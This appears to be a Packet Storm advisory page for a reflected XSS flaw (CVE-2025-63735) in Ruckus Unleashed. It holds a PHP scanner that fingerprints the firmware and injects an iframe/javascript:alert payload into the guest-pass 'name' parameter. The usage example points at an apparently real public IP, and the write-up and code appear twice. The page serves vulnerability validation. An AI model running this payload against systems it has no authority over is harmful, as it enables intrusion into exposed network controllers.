6.1
/ 10
MEDIUM
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Description
This is a testing script to validate whether or not a Ruckus Unleashed system is vulnerable to the cross site scripting vulnerability in version 200.13.6.1.319...
Basic Information
ID
PACKETSTORM:215813
Published
Feb 18, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Ruckus Unleashed 200.13.6.1.319 External Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ruckusnetworks.com/ |
=============================================================================================================================================
[+] Summary
This release introduces a remote security scanner capable of detecting vulnerable Ruckus Unleashed systems over LAN or WAN using external IP addresses.
[+] The scanner performs:
Version Enumeration
Endpoint Exposure Check
Reflected XSS Detection for CVEβ2025β63735
Captive Portal Validation
Full SignatureβBased Audit
The tool was built to identify Ruckus controllers exposed to the internet and automatically verify whether the system reflects unsanitized input in the name parameter.
[+] poc
usage : php poc.php --target 41.110.27.120
<?php
function http_get($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 10
]);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$target = $argv[1] ?? null;
if(!$target){
die("Usage: php scanner.php <target>\n");
}
echo "[+] Target: $target\n";
$base = "https://$target/selfguestpass/guestAccessSubmit.jsp";
$test = "$base?cookie=null&tip=5&name=test123";
echo "[+] Checking endpoint...\n";
$resp = http_get($test);
if(!$resp){
die("[!] No response from target.\n");
}
echo "[+] Endpoint accessible.\n";
echo "[+] Extracting version...\n";
preg_match('/([0-9]{3}\.[0-9]+\.[0-9]+\.[0-9]+)/', $resp, $m);
$version = $m[1] ?? "Unknown";
echo "[+] Firmware: $version\n";
if($version === "200.13.6.1.319"){
echo "[!] Version is vulnerable.\n";
}
echo "[+] Sending XSS payload...\n";
$payload = urlencode('</p><form><iframe src=javascript:alert(`xss`)>');
$url = "$base?cookie=null&tip=5&name=$payload";
$resp2 = http_get($url);
if(strpos($resp2, '</p><form><iframe') !== false){
echo "[!] REFLECTED XSS CONFIRMED (CVE-2025-63735)\n";
echo "[+] PoC URL:\n$url\n";
} else {
echo "[+] Not vulnerable.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : Ruckus Unleashed 200.13.6.1.319 External Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ruckusnetworks.com/ |
=============================================================================================================================================
[+] Summary
This release introduces a remote security scanner capable of detecting vulnerable Ruckus Unleashed systems over LAN or WAN using external IP addresses.
[+] The scanner performs:
Version Enumeration
Endpoint Exposure Check
Reflected XSS Detection for CVEβ2025β63735
Captive Portal Validation
Full SignatureβBased Audit
The tool was built to identify Ruckus controllers exposed to the internet and automatically verify whether the system reflects unsanitized input in the name parameter.
[+] poc
usage : php poc.php --target 41.110.27.120
<?php
function http_get($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 10
]);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$target = $argv[1] ?? null;
if(!$target){
die("Usage: php scanner.php <target>\n");
}
echo "[+] Target: $target\n";
$base = "https://$target/selfguestpass/guestAccessSubmit.jsp";
$test = "$base?cookie=null&tip=5&name=test123";
echo "[+] Checking endpoint...\n";
$resp = http_get($test);
if(!$resp){
die("[!] No response from target.\n");
}
echo "[+] Endpoint accessible.\n";
echo "[+] Extracting version...\n";
preg_match('/([0-9]{3}\.[0-9]+\.[0-9]+\.[0-9]+)/', $resp, $m);
$version = $m[1] ?? "Unknown";
echo "[+] Firmware: $version\n";
if($version === "200.13.6.1.319"){
echo "[!] Version is vulnerable.\n";
}
echo "[+] Sending XSS payload...\n";
$payload = urlencode('</p><form><iframe src=javascript:alert(`xss`)>');
$url = "$base?cookie=null&tip=5&name=$payload";
$resp2 = http_get($url);
if(strpos($resp2, '</p><form><iframe') !== false){
echo "[!] REFLECTED XSS CONFIRMED (CVE-2025-63735)\n";
echo "[+] PoC URL:\n$url\n";
} else {
echo "[+] Not vulnerable.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================